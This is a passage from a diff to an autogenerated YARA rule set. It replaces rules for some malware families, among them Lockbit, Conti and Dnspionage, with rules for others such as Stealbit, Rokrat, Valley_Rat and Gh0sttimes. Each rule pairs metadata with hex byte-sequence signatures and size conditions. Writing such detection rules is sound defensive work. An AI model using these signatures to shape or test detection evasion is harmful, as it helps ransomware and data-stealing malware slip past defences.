+ $sequence_9 = { 745d 40 50 e8???????? 8bf0 8b45c8 40 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <785408 } -rule MALPEDIA_Win_Alreay_Auto : FILE +rule MALPEDIA_Win_Jaff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9cdb1d27-466b-525b-895d-ad710c42b112" + id = "05c08a02-2b7b-5977-8a51-2a2090077d3b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alreay_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jaff_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "9b54d114d735844c857255b8100f13777f444dd5372ec863d1d85e3d492b2e7d" + logic_hash = "af5ef67353fca994a67e82aadde11782d5e684720bb76ef0f2df38c565071742" score = 75 quality = 75 tags = "FILE" @@ -180818,34 +183584,34 @@ rule MALPEDIA_Win_Alreay_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bca 83e103 03eb f3aa e9???????? 83fa07 7511 } - $sequence_1 = { 89b48484010000 8a442418 fec0 885c2420 8b5c2424 88442418 8b442420 } - $sequence_2 = { 894c2404 7407 b802000000 eb1d 8b90e8010000 85d2 7411 } - $sequence_3 = { 89442428 85c0 0f850c010000 8b442420 3bc7 7608 8bd7 } - $sequence_4 = { 8b8574010000 8bd1 23d0 83faff 0f848d000000 3bc3 7c55 } - $sequence_5 = { 8b15???????? 8b442414 8b742444 8b4c2448 42 40 83c604 } - $sequence_6 = { 8a16 8bcf 84d2 8bc6 741d 8a10 80fa5c } - $sequence_7 = { 8b8268020000 3bc1 0f852f040000 8b86b4040000 8bca 8b916c020000 3bd0 } - $sequence_8 = { bb16000000 3bc3 bf15000000 0f85f5010000 8b7500 8b86cc000000 8bd0 } - $sequence_9 = { 8d7c2448 83c9ff 33c0 8b54241c f2ae f7d1 49 } + $sequence_0 = { c746080a000000 c6460c01 ffd7 8b1d???????? 50 ffd3 6a14 } + $sequence_1 = { 8bf8 e8???????? 8b4704 48 7818 } + $sequence_2 = { 8b4514 8b4d10 6a00 8d55fc 52 50 51 } + $sequence_3 = { 72ed 8b45dc 50 6a00 ffd7 50 } + $sequence_4 = { ffd3 8945f0 8b450c 8d5de0 8d4df0 e8???????? 8b45e0 } + $sequence_5 = { 3b4510 0f82a5feffff 8b4d14 51 6a00 } + $sequence_6 = { 8d5598 52 8d45cc 50 e8???????? 8d7da8 } + $sequence_7 = { 33c2 2bc2 50 8d95f8fbffff 68???????? } + $sequence_8 = { 8d4584 e8???????? 8d7da4 8d75e4 e8???????? 8b55a4 8b3d???????? } + $sequence_9 = { c745f00a000000 c645f401 ffd3 50 ff15???????? 8945e8 } condition: - 7 of them and filesize <1867776 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Yayih_Auto : FILE +rule MALPEDIA_Win_Valley_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad6edea8-11c9-5fa2-96f2-3800b1bd4695" + id = "5aadade8-2e86-5c22-9399-653890e95f9a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yayih_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.valley_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "d13e6780f7fe46f9387338ccdb35700eb9e8a8c2ac7c13f232d1064c9386ae55" - score = 75 - quality = 75 + logic_hash = "788630470fd0066c9dad5026f208a936da1b0fab9009cb8b3a3ebf9a9cd14823" + score = 60 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -180857,32 +183623,32 @@ rule MALPEDIA_Win_Yayih_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5f ff7508 ff55f4 53 ff15???????? 8bc7 } - $sequence_1 = { 68???????? e8???????? 8b35???????? 83c40c 50 57 } - $sequence_2 = { 50 56 e8???????? 59 85c0 59 753c } - $sequence_3 = { 85c0 59 7507 57 e8???????? 59 e8???????? } - $sequence_4 = { ff15???????? 56 6880000000 6a03 56 6a01 8d85b8b8ffff } - $sequence_5 = { 66ab aa 59 33c0 8dbde9faffff 889de8faffff f3ab } - $sequence_6 = { 3bfe 750a 56 56 56 6a08 } - $sequence_7 = { e8???????? 6801200000 8d85b8b8ffff 56 50 e8???????? } - $sequence_8 = { 50 8d854cf6ffff 50 e8???????? 83c430 8d459c 50 } - $sequence_9 = { 0fafca 0fb65002 03ca 890d???????? 0fb64803 69c960ea0000 } + $sequence_0 = { 8b4910 e8???????? 2500020000 33d2 0bc2 7506 32c0 } + $sequence_1 = { e8???????? 50 8d4708 50 e8???????? 8bbdf0efffff 83c414 } + $sequence_2 = { 8bf0 83c404 85f6 742f e8???????? 84c0 ba???????? } + $sequence_3 = { 50 e8???????? 8b5654 33c9 8b4508 83c408 894d08 } + $sequence_4 = { 8d04dd00000000 50 e8???????? 8bf0 83c404 85f6 7447 } + $sequence_5 = { 8bc2 c1e81f 03c2 8d0c40 8b07 8d04c8 894704 } + $sequence_6 = { 8b55f4 4f 75ce 8b4df8 8b7d08 8b5510 3bca } + $sequence_7 = { 8b36 c6043e00 5f 5e 5d c3 55 } + $sequence_8 = { eb64 33c0 668945e4 e8???????? ff75dc 8b7b04 8d45e3 } + $sequence_9 = { c745fc00000000 53 8bce e8???????? 8b06 83f801 741e } condition: - 7 of them and filesize <57344 + 7 of them and filesize <2256896 } -rule MALPEDIA_Win_Dnspionage_Auto : FILE +rule MALPEDIA_Win_Stealbit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "80d80ee2-7c3c-5a6f-84fc-982c0a0f58b9" + id = "ba610849-1495-5151-b945-327f0dc5f838" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnspionage_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealbit_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "6f236089a9c79217d1f5a567e48544242146a1c819e624fb6aad3710206efaec" + logic_hash = "0ba0bc4f1da3f2dc67b8b88d21908b92c199e11ae8a3f814064895150fd93270" score = 75 quality = 75 tags = "FILE" @@ -180896,32 +183662,32 @@ rule MALPEDIA_Win_Dnspionage_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7470c00020000 7507 8bc8 e8???????? 894320 85c0 } - $sequence_1 = { 50 8d45f4 50 6a13 57 } - $sequence_2 = { 0f1f8000000000 8bc7 8d5001 8a08 40 84c9 75f9 } - $sequence_3 = { c7450c00000000 8d4d0c ba???????? 51 8d4df4 51 } - $sequence_4 = { 83f97f 7307 be7f000000 eb11 8bf7 8d4e01 0f1f00 } - $sequence_5 = { 33f6 397510 762c 8b45f0 } - $sequence_6 = { 8b4810 e8???????? a3???????? e9???????? } - $sequence_7 = { 57 8bfa 85f6 0f8487000000 85ff 0f847f000000 } - $sequence_8 = { 7202 8b12 56 52 8d8518feffff } - $sequence_9 = { 8bce 8903 83c408 c1e902 } + $sequence_0 = { 8b4e30 e8???????? 8b4e30 e8???????? 83663000 8d562c } + $sequence_1 = { 8d8580fbffff 50 e8???????? 8bc8 e8???????? ffd0 8bd8 } + $sequence_2 = { 8bfa 8bd9 e8???????? 8bc8 e8???????? ffd0 8bf0 } + $sequence_3 = { e8???????? 8bc8 e8???????? ffd0 6a02 68bf000000 53 } + $sequence_4 = { c786a802000000000000 8d7e50 33db 8b4620 } + $sequence_5 = { 6a6f 66898546ffffff 33c0 66898548ffffff 58 6a63 668985d2fcffff } + $sequence_6 = { 66899570feffff 66899574feffff 5a 6a6d 58 6a69 66898500feffff } + $sequence_7 = { 6689859afeffff 33c0 668955de 5a 6a61 6689bd86feffff } + $sequence_8 = { 8945f8 e8???????? 03c0 8bce 8bd0 e8???????? 6a0c } + $sequence_9 = { e8???????? 8bc8 e8???????? 3d15cffdb1 740b 46 3bf7 } condition: - 7 of them and filesize <786432 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Lockbit_Auto : FILE +rule MALPEDIA_Win_Rokrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "945a5bdc-50cc-5372-b470-aafc3e12d474" + id = "529b23ea-5ccb-5314-a032-246562122609" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockbit_auto.yar#L1-L203" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rokrat_auto.yar#L1-L152" license_url = "N/A" - logic_hash = "ef292234a38c5f85ea42d6220d555a65163be7c7bef94693195ea2cefdb10cc0" + logic_hash = "99c55c71740e0234c84ec3f4624ede5be8b8eb4baac41c4a1538d8db05d1af41" score = 75 quality = 75 tags = "FILE" @@ -180935,44 +183701,40 @@ rule MALPEDIA_Win_Lockbit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f28c8 660f73f904 660fefc8 0f28c1 660f73f804 } - $sequence_1 = { 50 e8???????? 8d858cfeffff 50 8d45c0 50 8d45a0 } - $sequence_2 = { fec1 47 4e 85f6 75d2 5d } - $sequence_3 = { 56 57 8d9d84fcffff b900c2eb0b e2fe e8???????? 53 } - $sequence_4 = { 6683f866 7706 6683e857 eb17 6683f830 720c 6683f839 } - $sequence_5 = { 33db 55 8b6d10 8bc1 } - $sequence_6 = { 8d8550fdffff 50 6a00 ff15???????? } - $sequence_7 = { 33c0 8d7df0 33c9 53 0fa2 } - $sequence_8 = { f745f800000002 740c 5f 5e } - $sequence_9 = { 02d3 8a5c1500 8a541d00 8a541500 fec2 8a441500 } - $sequence_10 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 } - $sequence_11 = { 53 56 57 33c0 8b5d14 33c9 33d2 } - $sequence_12 = { 8d45f8 50 8d45fc 50 ff75fc ff75f4 } - $sequence_13 = { e9???????? 6683f841 720c 6683f846 7706 6683e837 } - $sequence_14 = { 6a00 6a00 6800000040 ff75d4 } - $sequence_15 = { 5b 8907 897704 894f08 89570c f745f800000002 740c } - $sequence_16 = { 214493fc 8b5df8 8bc3 43 } - $sequence_17 = { 7407 8bce e8???????? 837b0402 } - $sequence_18 = { 7414 663901 740f 0f1f440000 } - $sequence_19 = { 1bdb 83e30b 83c328 ff7518 8b7d08 8d049500000000 ff7514 } + $sequence_0 = { 50 e8???????? 6a04 33c0 } + $sequence_1 = { 50 8bcf e8???????? 8d4538 3bd8 } + $sequence_2 = { 50 0fb74208 c1e910 51 50 } + $sequence_3 = { 50 8bcb e8???????? 8d4550 } + $sequence_4 = { 50 e8???????? 8d8edc000000 8d4520 } + $sequence_5 = { 56 8d4dc0 c745d000000000 668945c0 e8???????? c645fc03 8b45bc } + $sequence_6 = { 50 ff15???????? e8???????? 40 } + $sequence_7 = { 51 50 0fb74212 50 } + $sequence_8 = { 770a 68???????? e8???????? 837e1408 } + $sequence_9 = { ff15???????? 50 e8???????? 59 6a64 } + $sequence_10 = { 897dfc e8???????? 68???????? 8d4dd8 } + $sequence_11 = { c145f41e 8b5dfc 8db4339979825a 8975fc } + $sequence_12 = { c145f01e 8db4339979825a 8975f4 8b772c } + $sequence_13 = { c145f41e 8d9c3bd6c162ca 8b792c 337924 } + $sequence_14 = { c145f41e 8d8c0bdcbc1b8f 894dfc 8bca } + $sequence_15 = { c145f41e 8d9c1fd6c162ca 8b793c 337930 } condition: - 7 of them and filesize <2049024 + 7 of them and filesize <2932736 } -rule MALPEDIA_Win_Synccrypt_Auto : FILE +rule MALPEDIA_Win_Faketc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "06111ba7-b1d3-5613-b1dc-5c5b2d1d9432" + id = "17b42993-c08e-510a-afaa-62243000eea0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.synccrypt_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.faketc_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "f349f89fd6eccd96b82f1ed169c1d5231d52d67328e2977c4a89bd9cc0fef158" + logic_hash = "d424513e0804264658899ed0249bf1311c7683556fe66475d3d53a03a7ef5219" score = 75 - quality = 45 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -180984,32 +183746,32 @@ rule MALPEDIA_Win_Synccrypt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744240477000000 c7042422000000 e8???????? e9???????? c7442410af000000 c744240c94195900 c74424087a000000 } - $sequence_1 = { ba01000000 89f8 e8???????? 85c0 8b4c242c 0f84aa000000 8b4714 } - $sequence_2 = { 892c24 e8???????? 892c24 89c7 e8???????? 85c0 7517 } - $sequence_3 = { c1e806 85c0 7523 897358 83c318 89742408 891c24 } - $sequence_4 = { e8???????? 85c0 74c8 8d442414 8974240c 895c2408 89442404 } - $sequence_5 = { e8???????? 85c0 0f8413010000 8d7804 89c1 c7406800000000 89c3 } - $sequence_6 = { f6400c01 7451 891c24 e8???????? 83c001 c744240897010000 c7442404???????? } - $sequence_7 = { c7442404???????? c7042402000000 a3???????? e8???????? c7442404???????? c704240b000000 a3???????? } - $sequence_8 = { e8???????? 893424 e8???????? 8b442430 890424 e8???????? 39c7 } - $sequence_9 = { 890424 8954240c e8???????? 3b6c2418 8d45fe 746e 8b570c } + $sequence_0 = { e8???????? c684248001000002 8b442448 8b5004 8bce ffd2 84c0 } + $sequence_1 = { e8???????? 83c410 6a5e 8d8576f7ffff 50 6a00 6a00 } + $sequence_2 = { 899158010000 8b4508 8b484c 8b55f8 668b4104 66894248 8b4df8 } + $sequence_3 = { e8???????? 83c410 6a00 8b4d8c 51 6a01 8b5508 } + $sequence_4 = { ffd6 50 b86f000000 e8???????? 83c404 a3???????? eb06 } + $sequence_5 = { e9???????? 8d45d8 50 e8???????? c3 8d8548ffffff 50 } + $sequence_6 = { c1fa04 8bc2 c1e81f 03c2 895c2410 0f842b010000 895c241c } + $sequence_7 = { e8???????? 8b85b0fdffff 8b0d???????? 8d95b8fdffff 52 68???????? 50 } + $sequence_8 = { e8???????? b917000000 8bf0 bf???????? f3a5 66a5 c745fc02000000 } + $sequence_9 = { c745fc???????? c745f805000000 eb0e c745fc???????? c745f806000000 8b4d08 8b91fc030000 } condition: - 7 of them and filesize <4489216 + 7 of them and filesize <6864896 } -rule MALPEDIA_Win_Gacrux_Auto : FILE +rule MALPEDIA_Win_Manitsme_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0c66c13b-77d9-5c78-ab68-75b7e55560db" + id = "e6602fda-fe01-560f-b18c-c680ffd15493" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gacrux_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.manitsme_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "bb1a910d98caf8e19645b8aead4c6d896507b388f794dfe868a61d77f59f135d" + logic_hash = "d15a6ee2f4daf2c5f96b25b50dc747d6c2f7c5b49f115484153e22e9303b3c0c" score = 75 quality = 75 tags = "FILE" @@ -181023,34 +183785,34 @@ rule MALPEDIA_Win_Gacrux_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f848e000000 41 83482120 49 8b01 49 83c108 } - $sequence_1 = { 894808 48 8b4c2430 48 894810 8b4c2444 } - $sequence_2 = { 48 03ca 849c013c010000 740b 41 81cb00300000 45 } - $sequence_3 = { 6bc838 48 8b05???????? 8b540120 c1ea02 1bd2 3bd6 } - $sequence_4 = { 7543 48 85db 7409 } - $sequence_5 = { 8b3a 48 8bcd 48 c1e91d 48 8bc5 } - $sequence_6 = { 41 ffc1 49 83c204 41 81f900010000 } - $sequence_7 = { 0fb7ee 66c1ed08 45 8a780c 45 8bda 45 } - $sequence_8 = { 56 41 57 48 83ec50 49 63e8 } - $sequence_9 = { 4d 033e 45 0fb6ed 49 8bcf } + $sequence_0 = { 8b4c2438 33cc e8???????? 83c440 c3 6a0b 68???????? } + $sequence_1 = { 894c243c 894c2440 2bd0 8a08 880c02 83c001 84c9 } + $sequence_2 = { 6a00 6804040000 68???????? 57 } + $sequence_3 = { 83c408 eb09 57 e8???????? 83c404 8b15???????? 52 } + $sequence_4 = { 8b35???????? 57 8b3d???????? 8da42400000000 8d442428 50 } + $sequence_5 = { 8d442418 50 68fc030000 8d4c2424 } + $sequence_6 = { 897c2420 ff15???????? 8b0d???????? 51 ff15???????? 6a02 } + $sequence_7 = { 53 ff15???????? 68???????? 8d442418 50 c744241c401b0110 e8???????? } + $sequence_8 = { 897c2420 c744241c01000000 ff15???????? 83f8ff 7434 8d4c2408 } + $sequence_9 = { 8975e4 33c0 39b858340110 7467 ff45e4 } condition: - 7 of them and filesize <122880 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE +rule MALPEDIA_Win_Redleaves_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "63230a4f-7913-5b93-bb9a-30d89db03d73" + id = "cc8fab97-eb1b-5c40-a45f-7f10d21eb6b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_yahoo_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redleaves_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "f89dfba6353885aa09b69faf5df0db1655d3acae8a14a8bbfd9acb6fd6fd17df" + logic_hash = "1a1a0a58298bb01a37c19c26700f5fe323706257844254db91cc834d1d6766e7" score = 75 - quality = 75 + quality = 69 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -181062,34 +183824,41 @@ rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 7513 ff15???????? 8986a0841e00 } - $sequence_1 = { 56 ff15???????? 802000 56 e8???????? } - $sequence_2 = { 53 50 50 53 ff750c ff15???????? 57 } - $sequence_3 = { 39be9c841e00 59 7513 ff15???????? 8986a0841e00 33c0 } - $sequence_4 = { c745fc01000000 aa e8???????? 59 8d85f4d7ffff 50 8d45f8 } - $sequence_5 = { 50 8d45f8 50 8d85f4afffff } - $sequence_6 = { 8b7518 83c414 8d85fcd7ffff 8bcb } - $sequence_7 = { 8b4d08 e8???????? 85c0 53 } - $sequence_8 = { 59 50 ff75f8 ff75fc ffb69c841e00 ff15???????? } - $sequence_9 = { 8d85c8fcffff 68???????? 50 e8???????? 83c410 85c0 7466 } + $sequence_0 = { 51 7565 7279 55 7365 7254 } + $sequence_1 = { 47 657449 7041 64647254 } + $sequence_2 = { 54 53 51 7565 } + $sequence_3 = { 9c 894504 9c 9c } + $sequence_4 = { 83e901 0f85edffffff 89d0 29f8 5f 5b } + $sequence_5 = { 8d64241c d2c0 8a01 9c } + $sequence_6 = { 59 89f9 8d64241c d2c0 } + $sequence_7 = { 8b04b0 8b4018 898588fdffff 8d8578fdffff } + $sequence_8 = { 8b04b0 ff7018 ff701c 8d85acfdffff } + $sequence_9 = { 8bec 8b550c 53 8bd9 85d2 7f05 } + $sequence_10 = { 50 57 ffb610020000 e8???????? } + $sequence_11 = { 8bec a1???????? 56 85c0 7452 } + $sequence_12 = { 53 53 6804010000 8d85acfeffff } + $sequence_13 = { 8b04b0 83c41c 53 53 } + $sequence_14 = { 50 57 ffb60c020000 e8???????? 83c40c 8b860c020000 } + $sequence_15 = { 54 9c 60 9c } + $sequence_16 = { 9c 9c 8f442420 9c } condition: - 7 of them and filesize <8060928 + 7 of them and filesize <1679360 } -rule MALPEDIA_Win_Conti_Auto : FILE +rule MALPEDIA_Win_Glasses_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aae9ecae-21cf-5ec8-8511-8157ca36f115" + id = "c6da4c93-ee41-5868-bb14-5b5963376366" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.conti_auto.yar#L1-L225" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glasses_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "0be9a10d7e2a11f01ccc516eb831064a902454185cea8a72f6170734199b0c59" + logic_hash = "6195d6cdd9cb4570720f28f4358090026d5f6751f78a62fc950fb9d18ef5a646" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -181101,46 +183870,32 @@ rule MALPEDIA_Win_Conti_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 57 bf0e000000 8d7101 } - $sequence_1 = { 8d7f01 0fb6c0 b978000000 2bc8 } - $sequence_2 = { 57 bf0a000000 8d7101 8d5f75 8a06 8d7601 0fb6c0 } - $sequence_3 = { 8d7f01 0fb6c0 b96c000000 2bc8 } - $sequence_4 = { 0f1f4000 8a07 8d7f01 0fb6c0 b948000000 } - $sequence_5 = { 8975fc 803e00 7541 53 bb0a000000 } - $sequence_6 = { 8975fc 803e00 7542 53 bb0e000000 } - $sequence_7 = { 8d7f01 0fb6c0 b909000000 2bc8 } - $sequence_8 = { e8???????? 8bb6007d0000 85f6 75ef 6aff } - $sequence_9 = { 50 6a20 ff15???????? 68???????? ff15???????? 68???????? } - $sequence_10 = { 780e 7f07 3d00005000 7605 } - $sequence_11 = { 8bec 8b4d08 e8???????? 6a00 ff15???????? } - $sequence_12 = { 50 8b4508 ff7004 ff15???????? 85c0 7508 6a01 } - $sequence_13 = { 6810660000 ff7508 ff15???????? 85c0 } - $sequence_14 = { 85ff 7408 57 56 ff15???????? ff75f8 56 } - $sequence_15 = { 7411 a801 740d 83f001 50 ff7608 } - $sequence_16 = { 48894c2430 4c8d45ff 488d4d0f 418bd6 48894c2428 488d4d07 48894c2420 } - $sequence_17 = { 42884c0500 49ffc0 4983f80d 72af 44884d0f } - $sequence_18 = { 33d2 ffd0 897c2450 b856555555 } - $sequence_19 = { 0fb64500 0fb645ff 84c0 755c } - $sequence_20 = { 488b4f30 488b4738 4885c9 7406 } - $sequence_21 = { 48894c2448 488d55e0 488d4c2470 4533c0 } - $sequence_22 = { 42884c0501 49ffc0 4983f80c 72af } - $sequence_23 = { 41b801000000 488bd3 8bcf ffd0 4d85f6 } + $sequence_0 = { e8???????? 8bf0 83c40c 3bf3 0f85e8fdffff 8d4590 50 } + $sequence_1 = { e8???????? 8d852cfbffff 50 6a00 6a50 68???????? 8d8de4faffff } + $sequence_2 = { e8???????? 83bdd8fdffff00 0f849e000000 8bcb e8???????? 85c0 740d } + $sequence_3 = { e9???????? 8d8d38f9ffff e9???????? 8d8dfcf8ffff e9???????? 8d8dacf8ffff e9???????? } + $sequence_4 = { 8bf1 8975f0 c706???????? 8d8e84000000 c745fc01000000 c7460800000000 e8???????? } + $sequence_5 = { e8???????? 83b94814000002 0f8d54ffffff ff894c140000 8b814c140000 8b91580b0000 899481540b0000 } + $sequence_6 = { ff0d???????? 53 8bcf e8???????? c645ff00 5f 5e } + $sequence_7 = { ffd2 84c0 0f840b010000 8d4da4 e8???????? 8bf8 8b45cc } + $sequence_8 = { eb10 8bce e8???????? 8b5d18 8945e8 895dec 8b7510 } + $sequence_9 = { e8???????? 899e7c070000 e9???????? 83f801 7524 6a02 e8???????? } condition: - 7 of them and filesize <520192 + 7 of them and filesize <4177920 } -rule MALPEDIA_Win_Zlob_Auto : FILE +rule MALPEDIA_Win_Gh0Sttimes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4fad6172-d1e7-5d84-af68-8861117c390a" + id = "edb23d28-51bf-5c0e-a6f1-7bed7d79f2ed" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zlob_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gh0sttimes_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "31e17a6dc34e33dac3ecb614a6996745d9221261fdc2596cb1f9e420f9dc5bc9" + logic_hash = "cd1718bc24ef159d263847a726492a25887a81e094fffc2e2f0e4d7ba74c2151" score = 75 quality = 75 tags = "FILE" @@ -181154,32 +183909,38 @@ rule MALPEDIA_Win_Zlob_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 ffd7 68???????? e8???????? c70424???????? 68???????? } - $sequence_1 = { 50 ff742434 ff15???????? ff742414 e8???????? ff74242c 8b4c243c } - $sequence_2 = { 5d 8bcb 5b 83c404 ff6024 51 51 } - $sequence_3 = { 50 e8???????? 8b4508 83c410 83780400 7533 8d85f0eaffff } - $sequence_4 = { 58 2bc2 03c8 f644240c02 7504 8d4c7102 8bc1 } - $sequence_5 = { 56 8b35???????? 57 8b3d???????? 0f8407020000 837d10ff } - $sequence_6 = { ffd7 8b442414 6a01 6a00 6a00 ff30 ff15???????? } - $sequence_7 = { ff74242c 8901 50 e8???????? 83c410 ffd3 } - $sequence_8 = { ff75e8 8d4dbc e8???????? ff45f8 8b45f8 3b45e4 0f8cedfdffff } - $sequence_9 = { 57 8b3d???????? 89442410 8b4508 8b4c2410 } + $sequence_0 = { 899df0fdffff 899decfdffff 889df4fdffff 889df5fdffff 889df6fdffff 889df7fdffff 889df8fdffff } + $sequence_1 = { 52 50 8985dcfdffff e8???????? } + $sequence_2 = { 50 ff15???????? 85c0 750f 5b } + $sequence_3 = { 33c5 8945fc 8b4508 53 33db 8d8de0fdffff 51 } + $sequence_4 = { 0f852c010000 b8???????? 8d5001 8d642400 } + $sequence_5 = { 8b0e 51 ff15???????? 43 } + $sequence_6 = { 6a09 8d4df0 c645f070 8945f5 e8???????? 8b4dfc 5f } + $sequence_7 = { 0f8638010000 83c708 8b57fc 8b85ecfdffff 52 } + $sequence_8 = { 488b4c2438 488d442430 488d150c710200 4889442428 } + $sequence_9 = { 488b4c2438 488d442434 4c8d4c2430 4889442428 488d442440 488d1520790200 } + $sequence_10 = { 488b8f40010000 ff15???????? 488b8f40010000 ff15???????? 48c78740010000ffffffff } + $sequence_11 = { 488b4c2430 488b4968 e8???????? 4c8b5c2430 } + $sequence_12 = { 488b4c2430 83490c08 a808 7409 488b442430 83480c04 } + $sequence_13 = { 488b4c2430 48c1e80c f7d0 334108 } + $sequence_14 = { 488b4c2438 488d442430 488d15da700200 4889442428 } + $sequence_15 = { 488b4c2430 488b4968 33c0 66890451 488b442430 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <548864 } -rule MALPEDIA_Win_Blackshades_Auto : FILE +rule MALPEDIA_Win_Dimnie_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5" + id = "8c590346-8ec4-5fdf-b560-136be983395f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades" - 